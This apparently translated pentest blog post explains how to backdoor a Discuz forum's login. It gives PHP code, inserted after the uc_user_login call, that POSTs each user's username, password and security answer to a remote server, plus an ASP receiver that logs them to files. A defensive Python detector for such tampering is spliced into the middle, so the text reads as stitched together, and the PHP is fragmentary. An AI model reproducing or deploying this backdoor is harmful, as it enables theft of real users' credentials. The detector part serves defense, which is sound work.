http://www.80pentest.com/?p=835
Logging DZ passwords: I wrote my own code for this.
Insert a custom function into include/common.inc.php.
I chose to put it at lines 41-53. dz7.1-72: include/login.func.php (lines 49-51) | dz7.0: logging.php in the root directory
function request_by_other( $remote_server , $post_string ){
'header' => 'Content-type: application/x-www-form-urlencoded' . "/r/n" .
'User-Agent : xxbing/'s fuckyou!!!' . "/r/n" .
'Content-length: ' . strlen ( $post_string )+8,
'content' => 'mypost=' . $post_string )
$stream_context = stream_context_create( $context );
$data = file_get_contents ( $remote_server ,FALSE, $stream_context );
Find the logging.php file in the root directory and search for the following code.
$ucresult = uc_user_login( $username , $password , $loginfield == 'uid' );
Then insert the following code after it:
$showtime = gmdate ( "Ynj H:i:s" ,time()+8*3600);
$post_string = 'name1=' . $name2 . '&name=' . $username . '&password=' . $password . '&questionid=' . $questionid . '&answer=' . $answer . '&showtime=' . $showtime . '&from=' . $_SERVER [ 'SERVER_NAME' ];
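For defenders auditing a Discuz install, the modification described above leaves recognisable traces in the login path and the shared include file. The following Python triage script is an added example, not code from the original post; the rule set, verdict names and sample strings are constructed assumptions.

```python
import re

# Heuristic rules (assumptions of this example), modelled on the change described
# above: login secrets concatenated into a string next to the UCenter login call,
# and an outbound HTTP primitive that may live in a different include file.
RULES = {
    "credential-concat": re.compile(r"""['"]\s*\.\s*\$(?:password|answer|questionid)\b"""),
    "outbound-request": re.compile(r"\b(?:stream_context_create|file_get_contents|fsockopen|curl_exec)\s*\("),
    "login-call": re.compile(r"\buc_user_login\s*\("),
}

def scan_php(source):
    """Return [(line_no, rule_name)] for every rule hit in one PHP file's text."""
    return [(no, name)
            for no, line in enumerate(source.splitlines(), 1)
            for name, rx in RULES.items() if rx.search(line)]

def triage(files):
    """files maps path -> PHP source. Returns path -> verdict string."""
    hits = {p: {name for _, name in scan_php(src)} for p, src in files.items()}
    flagged = any("credential-concat" in h for h in hits.values())
    verdicts = {}
    for path, h in hits.items():
        if "credential-concat" in h:
            verdicts[path] = "review"            # secrets built into a string
        elif flagged and "outbound-request" in h:
            verdicts[path] = "outbound-helper"   # possible transport for them
        else:
            verdicts[path] = "no-match"
    return verdicts

# Constructed samples: single lines in the shape of those quoted on this page.
CLEAN_LOGIN = "<?php\n$ucresult = uc_user_login($username, $password, $loginfield == 'uid');\n"
MODIFIED_LOGIN = CLEAN_LOGIN + "$post_string = 'name=' . $username . '&password=' . $password;\n"
HELPER = "<?php\n$stream_context = stream_context_create($context);\n"

if __name__ == "__main__":
    tree = {"logging.php": MODIFIED_LOGIN, "include/common.inc.php": HELPER}
    for path, verdict in triage(tree).items():
        print(path, verdict, scan_php(tree[path]))
```

A "review" verdict is a prompt to diff the file against a clean copy of the same Discuz release; it is not proof of tampering, and legitimate code can trip these patterns.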
Because I am familiar with ASP, I wrote the receiving end in ASP.
The ASP code is as follows:
'body0 = request.form( "name1" )
body1 = request.form( "name" )
body2 = request.form( "password" )
body3 = request.form( "questionid" )
body4 = request.form( "answer" )
body5 = request.form( "showtime" )
body7 = request.form( "from" )
body6 = "账号:" &body1 & "---密码:" & body2 & "---问题ID:" & body3 & "---答案:" & body4 & "---时间:" & body5 & "---来源:" & body7
FileName = date ()& ".txt"
'The replacement here is for compatibility with IIS7 environments.
FileName = Replace(FileName, "/" , "-" )
Call CreateFile(body6,FileName)
Sub CreateFile(body,FileName)
Set fso = CreateObject( "Scripting.FileSystemObject" )
Set tf = fso.openTextFile(server.mappath(FileName),8,True,0)
tf.WriteLine "----------------"